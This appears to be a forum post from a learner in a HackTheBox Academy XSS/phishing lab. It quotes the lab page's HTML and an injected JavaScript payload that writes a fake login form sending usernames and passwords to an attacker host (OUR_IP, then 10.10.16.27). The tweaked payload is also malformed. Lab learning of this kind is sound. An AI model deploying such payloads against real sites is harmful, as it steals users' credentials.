Issue removing "Image URL" box on page - XSS/Phishing Module

HTB Content Academy
1

I’m struggling to remove an input field on the XSS/Phishing module of HTB Academy BBH course.

Basically, I have to carry out an XEE attack on a web page (I can’t seem to get an image to upload for some reason).

Here is the unedited source code for the web page:-

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <title>Online Image Viewer</title>
</head>

<body style="background-color: #141d2b; font-family: sans-serif; color: white;">
    <center>
        <h1>Online Image Viewer</h1>
        <div class="form-group">
            <form role="form" action="index.php" method="GET" id='urlform'>
                <input type="text" placeholder="Image URL" name="url">
            </form>
            <br>
                    </div>
    </center>
</body>

</html>

As part of the attack, I have to remove the input box shown in the image to make the page look more legit as a login page.

I’ve used the payload provided on the module page:-

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();

The payload creates the login input boxes as normal, but it does not remove the original image URL input box as it is intended to.

I have played around with the payload to comment out the extra bits of code that are displayed after input, which has worked, and the login input boxes are shown as normal, yet I just can’t seem to remove the original image URL input box.

Here is the code I have ended up with after tweaking the payload.

'document.write('<h3>Please login to continue</h3><form action=http://10.10.16.27><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"><document.getElementById('urlform').remove()><!--

I’ve tried multiple different things with the code to remove that Image URL input box, mostly played around with the closing tags and trying different tags, but just can’t seem to remove it.

It’s not essential for the module as the login form will still work, I’d just like to figure out how it’s done so I can understand it better.

Any help or advice is much appreciated.